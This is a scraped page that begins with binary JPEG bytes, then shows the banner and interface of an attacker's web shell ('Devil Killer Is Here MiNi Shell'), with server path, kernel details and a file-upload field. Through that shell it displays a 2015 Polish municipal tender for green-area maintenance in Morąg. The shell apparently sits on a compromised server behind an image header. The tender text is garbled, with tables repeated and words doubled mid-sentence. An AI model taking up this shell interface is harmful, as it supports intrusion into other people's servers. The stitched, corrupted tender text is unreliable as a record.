JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/296256-N-2015.html

<p class="kh_header"><b>Morąg: Utrzymanie i konserwacja terenów zieleni miejskiej w Morągu</b><br>
<b>Numer ogłoszenia: 296256 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja terenów zieleni miejskiej w Morągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest bieżące (cykl jednoroczny) utrzymanie i konserwacja  terenów zieleni miejskiej w Morągu, obejmującej 71 830,60  m2  trawników, 3 413 szt. krzewów różanych - wysadzonych na pow. 819 m2, żywopłoty (6 399,10 m2  pow. do cięcia i 1 892,30 m2 pow. do pielenia), 939 szt. drzew (około 607 szt. młodych), 1 051 szt. skupin  krzewów oraz 1 545 szt. bylin wraz z wrzosami wysadzonych na pow. 171,66 m2 

Wykaz trawników i kwietników  miejskich - do bieżącej konserwacji i utrzymania w ciągu roku.
L.p.
= Nr Planu sytuacyjnego	Nazwa trawnika	Powierzchnia trawnika [m2]	Różanki pow. [m2] sztuki	Żywopłot
pow. pielenia [m2]
pow. cięcia [m2]	Drzewka
ilość [szt.]
	Skupiny
ilość [szt.]	
Byliny  i wrzosy
pow. [m2] sztuki
1	2	3	4	5	6	7	8

1.	ul. Mickiewicza/
ul. 11 Listopada	1 415	-	133


406	       25	-	        -

2.	ul. 3 Maja/
ul. Mickiewicza	
197	134

735	60

213	
15	-	-

3.	ul. Mickiewicza
(przy sklepie Biedronka)	
80	-	-	
10
	-	-

4.	ul. Mickiewicza
(przy MDK)	
240
	-	-	
11	140	-

5.	ul. Dąbrowskiego/                   ul. 3 Maja	
1 767	135 

306	132

392	
6	-	-

6.	Park Sportowo - Rekreacyjny	
31 683	-	39,50

126,30	
391	551	171,66

1 545

7.	ul. Warmińska/
ul. Kaszubska	
1 181	
-	88

244	
36	-	-

8.	ul. Kwiatowa/
ul. Mickiewicza/
Dworzec	
953	51 

250	91

272	
12	-	-

9.
	
ul. Kajki	
3 573	144

806	163

600	
38	-	-

10.	ul. Dąbrowskiego/
ul. Szpitalna	
1 677	64 

180	
-	
34	-	-

11.	
Pergola	
5 867	67

375	303

974	
23	-	-

12.	ul.11 Listopada
4, 4A, 5	
720	45 

216	
-	
9	-	-

13.	
Pałac Dohnów	
7 708	
-	360

1 243	
23	-	-

14.	Pl. Jana Pawła II/
ul. Krzywa	
1 260	179

545	133

492	
140	-	-

15.	ul. Dworcowa/
ul. 3 Maja	
1 597	-	
-	
22	190	-

16.	ul. Zbożowa
(Plac zabaw, boisko)	
1 580	-	76

229	
35
	-	-

17.	Kol. Warszawska
(Tor rolkowy)	
5 200	-	173,80

820,80	-	-	-

18.	ul. Mickiewicza 8A
	      
287	-	26

84	-	-	-

19.	                        ul. Kaszubska/
                            ul. Leśna/
                         ul. Kujawska	
826	-	66

199	
18	-	-

   20.
	ul. Witosa/
ul. Daszyńskiego	
 464,60
	-	
-	
44
	-	-

21.	                        ul. Warmińska/
                 -      ul. Dworcowa	
  627	-	38

76	 
19	-	-

 22.	ul. Warmińska
                            (przy Przychodni)	 
  1 235	-	-	
22	-	-

23.
	
ul. Wróblewskiego/
ul. Prusa	
475
	-	-	
6
	
140	-
24.	ul. Pułaskiego 14	            -	-	10

28	-	-	-
25.	ul. Sienkiewicza   (przy Orliku)
	
890

	-	-	-	-	-
26.	ul. Wróblewskiego/
ul. Rubinowa	 253	-	-	-	30	-
27.	ul. Dworcowa 7	75	-	-	-	-	-
28.	         RAZEM:	71 830,60	819
3 413	1 892,30
6 399,10	939	1 051	     1wień: 77310000-6
Bieżące (cykl jednoroczny) utrzymanie i konserwacja  terenów zieleni miejskiej w Morągu, obejmującej                     71 830,60  m2  trawników, 3 413 szt. krzewów różanych - wysadzonych na pow. 819 m2, żywopłoty (6 399,10 m2  pow. do cięcia i 1 892,30 m2 pow. do pielenia), 939 szt. drzew (około 607 szt. młodych), 1 051 szt. skupin  krzewów oraz 1 545 szt. bylin wraz z wrzosami wysadzonych na pow. 171,66 m2 

Wykaz trawników i kwietników  miejskich - do bieżącej konserwacji i utrzymania w ciągu roku.
L.p.
= Nr Planu sytuacyjnego	Nazwa trawnika	Powierzchnia trawnika [m2]	Różanki pow. [m2] sztuki	Żywopłot
pow. pielenia [m2]
pow. cięcia [m2]	Drzewka
ilość [szt.]
	Skupiny
ilość [szt.]	
Byliny  i wrzosy
pow. [m2] sztuki
1	2	3	4	5	6	7	8

1.	ul. Mickiewicza/
ul. 11 Listopada	1 415	-	133


406	       25	-	        -

2.	ul. 3 Maja/
ul. Mickiewicza	
197	134

735	60

213	
15	-	-

3.	ul. Mickiewicza
(przy sklepie Biedronka)	
80	-	-	
10
	-	-

4.	ul. Mickiewicza
(przy MDK)	
240
	-	-	
11	140	-

5.	ul. Dąbrowskiego/                   ul. 3 Maja	
1 767	135 

306	132

392	
6	-	-

6.	Park Sportowo - Rekreacyjny	
31 683	-	39,50

126,30	
391	551	171,66

1 545

7.	ul. Warmińska/
ul. Kaszubska	
1 181	
-	88

244	
36	-	-

8.	ul. Kwiatowa/
ul. Mickiewicza/
Dworzec	
953	51 

250	91

272	
12	-	-

9.
	
ul. Kajki	
3 573	144

806	163

600	
38	-	-

10.	ul. Dąbrowskiego/
ul. Szpitalna	
1 677	64 

180	
-	
34	-	-

11.	
Pergola	
5 867	67

375	303

974	
23	-	-

12.	ul.11 Listopada
4, 4A, 5	
720	45 

216	
-	
9	-	-

13.	
Pałac Dohnów	
7 708	
-	360

1 243	
23	-	-

14.	Pl. Jana Pawła II/
ul. Krzywa	
1 260	179

545	133

492	
140	-	-

15.	ul. Dworcowa/
ul. 3 Maja	
1 597	-	
-	
22	190	-

16.	ul. Zbożowa
(Plac zabaw, boisko)	
1 580	-	76

229	
35
	-	-

17.	Kol. Warszawska
(Tor rolkowy)	
5 200	-	173,80

820,80	-	-	-

18.	ul. Mickiewicza 8A
	      
287	-	26

84	-	-	-

19.	                        ul. Kaszubska/
                            ul. Leśna/
                         ul. Kujawska	
826	-	66

199	
18	-	-

   20.
	ul. Witosa/
ul. Daszyńskiego	
 464,60
	-	
-	
44
	-	-

21.	                        ul. Warmińska/
                 -      ul. Dworcowa	
  627	-	38

76	 
19	-	-

 22.	ul. Warmińska
                            (przy Przychodni)	 
  1 235	-	-	
22	-	-

23.
	
ul. Wróblewskiego/
ul. Prusa	
475
	-	-	
6
	
140	-
24.	ul. Pułaskiego 14	            -	-	10

28	-	-	-
25.	ul. Sienkiewicza   (przy Orliku)
	
890

	-	-	-	-	-
26.	ul. Wróblewskiego/
ul. Rubinowa	 253	-	-	-	30	-
27.	ul. Dworcowa 7	75	-	-	-	-	-
28.	         RAZEM:	71 830,60	819
3 413	1 892,30
6 399,10	939	1 051	     171,66
     1 545

Wyszczególnienie robót i czynności objętych zzynności objętych zamówieniem
 
1. Stałe utrzymywanie trawników w stanie wykoszonym - maksymalna wysokość 
trawy - 8 cm, powierzchnia koszenia - 71 830,60 m2
a)	Skoszoną trawę należy wygrabić, zebrać w pryzmy i wywozić do miejsca jej utylizacji na bieżąco,
b)	Nie dopuszcza się zalegania skoszonej lub spryzmowanej trawy w miejscach objętych przedmiotem zamówienia. 
Musi być ona zebrana i wywieziona, najpóźniej do godziny 12.00, dnia następnego po koszeniu,
c)	Koszenie trawników obejmuje także usuwanie samosiewów, odrostów korzeniowych i pniowych z drzew 
rosnących na utrzymywanych trawnikach, chwastów wokół drzew, krzewów, lamp, znaków drogowych, barierek, 
obiektów małej architektury itp.,
d)	Trawniki przy skupiskach krzewów, bylin i żywopłotach oraz przy obiektach małej architektury należy kosić 
z należytą starannością tak, aby nie uszkodzić roślin oraz elementów architektonicznych. Miejsca trudnodostępne 
należy dokosić ręcznie,
e)	Prace uważa się za wykonane, jeżeli trawa będzie skoszona, wygrabiona i wywieziona. W razie stwierdzenia 
zaniedbań Wykonawca ma obowiązek poprawienia prac w wyznaczonym przez Zamawiającego terminie (jednak 
nie dłuższym niż 2 dni), inaczej prace uważa się za niewykonane.
2.	Stałe utrzymywanie żywopłotów w stanie przyciętym - maksymalna wysokość odrostów - 10 cm, pow. do 
cięcia - 6 399,10 m2    
a)	Ukształtowanie pokroju naturalnego lpokroju naturalnego lub całkowicie sztucznego tj. cięcie z trzech stron, górna powierzchnia 
żywopłotu ma być prowadzona w jednej płaszczyźnie, bez wypukłości i zagłębień lub cięcie pielęgnacyjne na 
formowaniu krzewów zgodnie z ich naturalnym pokrojem. W czasie wykonywania tej czynności należy usunąć 
gałęzie suche, połamane, stare, krzyżujące się i zagęszczające. Po wykonaniu prac teren należy uprzątnąć, odpady 
zgarnąć w pryzmy, załadować na środek transportowy, wywieźć i zutylizować. 
3.	Stałe utrzymywanie żywopłotów w stanie wypielonym, pow. do pielenia - 1 892,30 m2
4.	Stałe utrzymywanie kwietników - różanek, w stanie wypielonym, pow. do pielenia 819 m2   
5.   Przycięcie pędów róż wiosną - 3 413 szt.
6.   Przycięcie róż jesienią - 3 413 szt.
7.   Okopczykowanie krzewów róż jesienią - 3 413 szt.
8.   Przykrycie krzewów róż gałęziami przed zimą (łącznie z pozyskaniem gałęzi świerkowych) - 3 413 szt.
 9.  Odkrycie krzewów róż z gałęzi świerkowych (łącznie z wywiezieniem) - 3 413 szt.
10. Rozkopczykowanie róż na wiosnę - 3 413 szt.
       11.  Stałe utrzymywanie wypielonych mis przy młodych drzewkach, na terenie  zieleńców - 708 szt.
12. Wygrabienie zanieczyszczeń z trawników wiosną i ich wywóz -powierzchnia do sprzątania- 71 830,60 m2
13. Wygrabienie zanieczyszczeń i liści z trawników jesienią i ich wywóz - pow. do sprzątania -71 830,60 m2
a)	Jesienne wygrabianie liści, uschniętych traw, owocostanów, mchów oraz likwidacja kretowisk z trawników, 
terenów zadrzewionych i zakrzewionych. Po wykonaniu zabiegów teren należy uprzątnąć, odpady zgarnąć 
w pryzmy, załadować na środek transportowy, przewieźć i zutylizować. Prace uważa się za wykonane, 
jeżeli liście zostaną usunięte z całej powierzchni przeznaczonej do grabienia. W razie stwierdzenia przez 
Zamawiającego nienależytego wykonania prac Wykonawca ma obowiązek ich poprawienia w terminie 
wyznaczonym przez Zamawiającego (max do 2 dni), inaczej prace uważa się za niewykonane. 
14. Obcinanie i formowanie koron młodych drzew w okresie ich spoczynku - tj. zimą - 607szt.
15. Stałe obcinanie odrostów przy drzewach - wg potrzeb
          16. Stałe utrzymywanie obciętych obrzeży trawników - na stykach z krawężnikami  drogowymi i obrzeżami
              trawnikowymi - 12 035,50 mb
          17. Nawożenie na powierzchni 819 m2 krzewów róż w okresie letnim nawozem mineralnym Azofoska o łącznej dawce 
              rocznej - 450 kg nawozu  wliczając zakup nawozów (ze skł. Kz)
            18. Wykonanie oprysków krzewów róż środkami chemicznymi (łącznie z ich zakupem + Kz) zapobiegającym chorobom 
                - minimum trzy opryski w cyklu rocznym, łącznie z roślinami z sąsiedztwa, na których znajdują się szkodniki objęte 
  zkodniki objęte 
                   zabiegiem zwalczania
 19. Stałe utrzymywanie czystości polegające na:
       - usuwanie z podłoża połamanych gałęzi opadłych po gwałtownych wichurach, jak również usuwanie wiszących lub obłamanych w trakcie wichur konarów.
       - zbieraniu papierów, kamieni, folii, puszek, butelek, szkła, gałęzi i innych zanieczyszczeń 
         znajdujących się na całej powierzchni terenów do utrzymania zaznaczonych na załącznikach graficznych, w tym również ze schodów (za wyjątkiem muszli koncertowej i placu przed muszlą koncertową)
20. Podlewanie młodych drzewek przy ratuszu oraz posadzonych w pojemnikach w razie wystąpienia suszy.
a)	Podlewanie Wykonawca zobowiązany jest wykonywać na bieżąco wg potrzeb wynikających z warunków 
pogodowych.
21. W okresie zimowym, stałe odśnieżanie schodów i posypywanie ich piaskiem w celu usunięcia ślizgości w nast. miejscach:
       a) park sportowo-rekreacyjny,
 b) przejście w murze na Pergoli - dojście do Starego Miasta,
 c) zieleniec na skrzyżowaniu ulicy Dąbrowskiego i ulicy 3-go Maja,
        d) zieleniec przy ul. Kajki,
        e) przy pomniku PRL przy ul. Krzywej,
         f) Pałac Dohnów.
22.   Pielenie skupin krzewów - 1051 szt.
23.   Dwukrotne (kwiecień i czerwiec) obsadzenie kwiatami jednorocznymi (wraz z pielęgnacją i podlewaniem):
      -  4 stojaków usytuowanych przy Ratuszu Miejskim w Morągu
      -  6 donic usytuowanych przy Urzędzie Miejskim w Morągu

a)	Pielenie i spulchnianie gleby;
b)	Usuwanie przekwitłych kwiatów/kwiatostanów;
c)	Podlewanie wg potrzeb zgodnie ze sztuką ogrodniczą;
d)	Obcięcie brzegów kwietników;
e)	Usuwanie obumarłych fragmentów roślin (suche liście itp.);
f)	Po sezonie likwidacja obsadzeń wraz z usunięciem roślin;
g)	Po wykonaniu prac teren należy uprzątnąć, odpady wywieźć i zutylizować.
h)	Nie dopuszcza się! Przesuszenia lub przemoczenia, gleby, zachwaszczenia, nieestetycznego wyglądu stojaków 
i donic oraz niewykonania któregokolwiek z powyższych zabiegów w sezonie.

Materiał roślinny do obsadzeń zabezpiecza Wykonawca we własnym zakresie i na własny koszt - gatunek, ilość, 
miejsce i termin nasadzeń uzgadnia z zamawiającym. Materiał roślinny powinien mieć dobrze rozwinięty system 
korzeniowy, być zdrowy, bez oznak chorobowych i żerowania szkodników, z wyraźnie wybarwionymi pąkami 
kwiatowymi. 
24. Pielęgnacja  roślin  w  donicach  kwiatowych (8 kompletów) na terenie Morąga
       -  dwukrotne obsadzenie kwiatami jednorocznymi (kwiecień i czerwiec)
       -  podlewanie 12 razy w miesiącu

a)	Pielenie i spulchnianie gleby;
b)	Usuwanie przekwitłych kwiatów/kwiatostanów;
c)	Obcięcie brzegów kwietników;
d)	Usuwanie obumarłych fragmentów roślin (suche liście itp.);
e)	Po sezonie likwidacja obsadzeń wraz z usunięciem roślin;
f)	Po wykonaniu prac teren należy uprzątnąć, odpady wywieźć i zutylizować.
g)	Nie dopuszcza się! Przesuszenia lub przemoczenia, gleby, zachwaszczenia, nieestetycznego wyglądu 
donic oraz niewykonania któregokolwiek z powyższych zabiegów w sezonie.

Materiał roślinny do obsadzeń zabezpiecza Wykonawca we własnym zakresie i na własny koszt - gatunek, ilość, 
miejsce i termin nasadzeń uzgadnia z zamawiającym. Materiał roślinny powinien mieć dobrze rozwinięty system 
korzeniowy, być zdrowy, bez oznak chorobowych i żerowania szkodników, z wyraźnie wybarwionymi pąkami 
kwiatowymi. 
25. Pielenie i pielęgnacja roślin w Labiryncie zlokalizowanym na terenie Parku Sportowo-  Rekreacyjnego (ilość roślin 1200 szt.  
       wysadzonych na powierzchni  1133 m2)    
a)	Pielenie i spulchnianie gleby.
b)	Po wykonaniu prac teren należy uprzątnąć, odpady zgarnąć w pryzmy, załadować na środek transportowy,   
 wywieźć i zutylizować. 
c)	Nawożenie nawozami mineralnymi i podlewanie.
26. Pielenie i pielęgnacja bylin wraz z wrzosami - 1 545 szt.
a)	Pielenie i spulchnianie gleby.
b)	Usuwanie przekwitłych kwiatów.
c)	Po wykonaniu prac teren należy uprzątnąć, odpady zgarnąć w pryzmy, załadować na środek transportowy,   
 wywieźć i zutylizować. 
d)	Nawożenie nawozami mineralnymi i podlewanie.
e)	Zabezpieczenie roślin na okres zimowy oraz wiosenne odkrycie roślin.
27.  Pielęgnacja różanek rosnących wzdłuż ul. Dąbrowskiego na odcinku od ronda na skrzyżowaniu ulic: Dąbrowskiego i 3 Maja do   
       wieży ciśnień (powierzchnia  ok. 45,5 m2) - 3 razy w miesiącu
a)	 zbieranie papierów i zanieczyszczeń,
         b)     wygrabianie liści i zanieczyszczeń,
         c)     pielenie i przycinanie róż.
28 .  Obsadzenie kwiatami jednorocznymi małego ronda  oraz  murku  przy  wejściu do Parku  Sportowo-Rekreacyjnego od strony   
        parkingu przy ul. 11 listopada (pierwsze obsadzenie w  kwietniu - 300 szt. bratków, drugie obsadzenie w czerwcu - 300 szt. 
        begonii)
29.   Obsadzenie kwiatami jednorocznymi gat. begonia (500 szt.) ronda na skrzyżowaniu ulic: Dąbrowskiego i 3 Maja - II termin 
        (I termin obsadzenia ronda kwiatami jednorocznymi  realizowany jest w kwietniu w ramach umowy na utrzymanie rond z 
         Województwem  Warmińsko-Mazurskim)
30.   Pielęgnacja skarp przy rzeczce Morążek w Parku Sportowo-Rekreacyjnym (powierzchnia  ok. 960 m2)  -  3 razy w miesiącu
      a)  wykaszanie skarp
      b)  wygrabianie skoszonej trawy,
      c)  oczyszczanie wody z trawy i innych drobnych zanieczyszczeń,
31.   Systematyczne niszczenie chwastów w obrębie placu zabaw w Parku Sportowo-Rekreacyjnym (powierzchnia ok. 2 528 m2.)
       a)  pielenie chwastów,
       b)  wygrabianie i zbieranie suchych chwastów,

Obszar objęty zamówieniem przedstawiony w formie graficznej zawarty został w załączniku nr 1 do umowy oraz zbiorczo w formie opisowej w dokumencie pod nazwą Szczegółowy opis przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 10 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości:
3 000,00 PLN (słownie: trzy tysiące 00/100) 
w terminie do dnia 16.11.2015 r. do godz. 09.00.
Wadium może być wniesione w następującej formie:
1)	Pieniądzu - przelewem na konto zamawiającego: Urząd Miejski w Morągu, Bank Millennium S.A. O/Morąg                                         32 1160 2202 0000 0000 6193 4146, o uznaniu przez zamawiającego, że wadium w pieniądzu wpłacono w terminie decyduje data wpływu środków na rachunek zamawiającego. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym Zamawiającego, przed upływem terminu (godziny) przewidzianego na wniesienie wadium.
2)	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
3)	Gwarancji bankowej
4)	Gwarancji ubezpieczeniowej 
5)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.)
W zależności od wybranej formy wadium (ust.9.2 pkt 2-5) - zaleca się kserokopię dokumentu potwierdzającego wniesienie wadium dołączyć do oferty, a oryginał należy złożyć w siedzibie Zamawiającego w kasie zamawiającego (parter- pokój nr 12). W przypadku braku możliwości dostarczenia oryginału do kasy zamawiającego, oryginał dokumentu należy umieścić w kopercie wraz z ofertą. 
Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
1)	ustalać beneficjenta gwarancji, tj. Gminę Morąg reprezentowaną przez Burmistrza Miasta Morąga,
2)	określać kwotę gwarantowaną w zł (ustaloną w SIWZ),
3)	określać termin ważności (wynikający z SIWZ),
4)	określać przedmiot gwarancji (wynikający z SIWZ),
5)	musi zawierać klauzule gwarantujące bezwarunkową wypłatę na rzecz zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 46 ust. 4a i ust. 5 ustawy Pzp tj. być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie do wypłaty Zamawiającemu pełnej kwoty wadium w następujących okolicznościach:
1)	gdy wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się nie możliwe z przyczyn leżących po stronie wykonawcy; (art. 46 ust.5 ustawy pzp)
6)	być gwarancją nie odwoływalną, płatną na każde żądanie do wypłaty Zamawiającemu pełnej kwoty wadium w przypadku gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę, jako najkorzystniejszej (art.46 ust.4a ustawy pzp).
7)	Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
Wadium musi obejmować cały okres związania z ofertą. 
Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
Zwrot wadium:
1)	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza;
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie niniejszego zamówienia;
3)	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert;
